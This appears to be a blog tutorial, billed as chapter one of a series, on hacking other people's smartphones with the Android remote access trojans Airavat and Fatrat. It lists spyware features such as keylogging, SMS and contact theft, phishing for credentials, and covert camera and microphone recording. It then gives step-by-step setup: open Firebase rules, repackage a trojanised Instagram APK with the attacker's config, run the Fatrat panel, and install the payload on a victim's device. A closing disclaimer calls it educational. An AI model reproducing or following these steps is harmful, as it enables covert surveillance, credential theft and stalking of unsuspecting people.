Hello Hy Namaste Salama It's Me Gulshan Nagda. Today I Am Gonna Teach You How Real Hackers Hack Smartphone. See their are several ways through which smartphones are hacked but i will show you the pro methods that every hacker suggest. We Have Made it as Series And This is the chapter - 1 In Which We Will Discuss On 2 Methods. Hacking An Smartphone is not easy because there are many security checks it is possible only when the victim allows the permission of the system. Ones's He Allowed Than We Can Deploy our attacks in target's system.
We Will Learn 2 Types Of attacks first ones is RAT'S And Second one is Python Scripts.
What is smartphone hacking?
Now Let's Learn How To Deploy RAT's Attack:-
What is Rat?
In This Universe A Hacker uses Many Attacks to hack the victim's system and one of them is Rat's Attack. It is a powerful attack.
A remote access Trojan (RAT) is a program used by the intruders to take complete control of the victim's computer for the purpose of performing various malicious activities. Unlike viruses and worms, RATs can exist well before detection and even remain after removal. They operate in a stealth mode and are usually rather small so as to avoid detection.
How To deploy Rat in the victim's system:-
In This tutorial i am going to use Airavat rat and Fatrat which is a multifuctional Android Rat With GUI based web panel without port forwarding and fatrat is a cloud based remote android management suite, powerd by nodejs respectively.
Features of Airavat RAT Are -
- Read all the files of Internal Storage
- Download Any Media to your Device from Victims Device
- Get all the system information of Victim Device
- Retrieve the List of Installed Applications
- Retrive SMS
- Retrive Call Logs
- Retrive Contacts
- Send SMS
- Gets all the Notifications
- Keylogger
- Admin Permission
- Show Phishing Pages to steal credentials through notification.
- Steal credentials through pre built phishing pages
- Open any suspicious website through notification to steal credentials.
- Record Audio through Mic
- Play music in Victim's device
- Vibrate Device
- Text To Speech
- Turn On/Off Torch Light
- Change Wallpaper
- Run shell Commands
- Get Clipboard text (Only When app's Activity is visible)
- Launch Any URL (Only When app's Activity is visible)
- Pre Binded with Instagram Webview Phishing
- Runs In Background
- Auto Starts on restarting the device
- Auto Starts when any notification arrives
- No port forwarding needed
Features Of Fatrat Are -
1)Screenshot Capture
2)Screen Recorder
3)Rear Camera Recorder
4)Front Camera Recorder
5)Lock Device
6)GPS Logging
7)Microphone Recording
8)View Contacts
9)SMS Logs
10)Send SMS
11)Call Logs
12)View Installed Apps
13)View Stub Permissions
14)Live Clipboard Logging
15)Live Notification Logging
16)View WiFi Networks (logs previously seen)
17)File Explorer & Downloader
18Command Queuing
19)Built In APK Builder
20) View Passwords Of Instagram, Twitter, Facebook, Website, More And More.
Requirements for Airavat -
Termux Or Kali With Latest Update
Firebase Account
ApkEasy Tool(For PC) or ApkTool M(For Android)
Requirements for Fatrat -
Termux Or Kali With Latest Update
Nodejs
Npm
Ngrok
How To Build Airavat :-
- Create an Firebase Account and afterwords create a new project with any name.
- Enable Firebase Database and Firebase Storage.
In Firebase Database Click on the rules and set .read and .write to true{"rules": {".read": "true",".write": "true"}}
In Firebase Storage allow reads and writes for all paths.rules_version = '2';service firebase.storage {match /b/{bucket}/o {match /{allPaths=**} {allow read, write}}}
- Now Go to project overview and create an Android App and download the google-services.json file.
- Also create a web app and copy the config of webapp.
Panel Setup ~
- You can use Github Pages , Firebase Hosting or any Hosting Website (except 000webhost) for hosting the panel.
- Open index.html File and from line number 16 replace the config with your web app config which you have created on Step 6.
- Save the file , Your Panel Setup is completed.
Android RAT ~
Download Instagram.apk
Decompile it using any Decompiler recommend above.
Now open res/values/strings.xml file.
Replace values of firebase_database_url , google_api_key , google_app_id , google_storage_bucket , project_id with your Firebase Account using google-services.json file which you have downloaded on step 5
Example *
<string name="firebase_database_url">https://your_database_url.firebase.com</string>
<string name="google_api_key">your_api_key</string>
<string name="google_app_id">your_app_id</string>
<string name="google_storage_bucket">your_storage_bucket_url</string>
<string name="project_id">project_id</string>
Now compile the code with appt2.
Install the app in victim's device and give all the permissions after that the connection will show up in web panel.
Watch Tutorial ~ https://youtu.be/atSX_YDniyM (Mr. Ethical Yt)
How To Build Fatrat :-
How to install nodejs?
Node.js is a JavaScript runtime built on Chrome’s V8 JavaScript engine. type this below command on your terminal.
- Termux
pkg install nodejs
- Linux
sudo apt install nodejs
How to install Npm?
npm is two things: first and foremost, it is an online repository for the publishing of open-source Node.js projects; second, it is a command-line utility for interacting with said repository that aids in package installation, version management, and dependency management
Now type this below command on your terminal this command will help you to install npm on your device
- Termux
apt install npm
- Linux
sudo apt install npm
NOW LET'S HACK SMARTPHONE THROUGH THIS RAT....
Step 1:
First we need to download fatrat package so click this below download button
Once you download extract this tool on your device with password = solutioner problem if you are a termux user means move this into termux.
Step 2:
Now change your directory into server directory so type this below command on your terminal
cd server
Step 3:
Now open maindb.json file once you open this file you can see username and password but the password was hash format so we can’t decrypt that password but we can change therefore change that password this following way
Now open Md5 hash generator and change your password into hash format
https://www.md5hashgenerator.com/
Once you generate hash format just copy and paste it in your maindb.json file password location see this below image
Once you change your password means just save it.
Step 4:
Once you complete above all steps now type this below command on your terminal with server directory
npm install
Step 5:
Now you need to execute this tool on your terminal so type this below command on your terminal.
node index.js
Once you execute was completed then find your ip address so open new terminal and type this below command.
- Termux
ifconfig
- Linux
sudo ifconfig
copy your ip address and open your browser once you open browser just past your copied ip address with 22533 port number
example: http://(your ip address):22533
Now type username and password once you type your dashboard will open see this below image
Now open apk builder section and build your payload once your payload was generated means install your victim phone and get every information at any time.
Watch The Tutorial ~ https://youtube.com/channel/UCdFHz_tMEhC1rafkIMiQp0g
❌DISCLAIMER❌
This Article Does Not Promote any illegal content. All content provided by this article is for educational purposes only. I am not responsible if you do any activity it's totally your responsibility.
If You Are Facing Any Issue Please Response As In Comment Section And Also Tell Us How Was Our Chapter 1 Of How Real Hackers Hack Smartphone It's Just A Small Methods Don't Be Thinking That Real Hackers Hack Like This Only. I Just Shown The Simplest Methods How They Hack As We Will Continue This series We Will Learn The Difficult and Working Methods So, Stay Tuned With Us We Will Bring More chapters On This Topic So For now Try This One.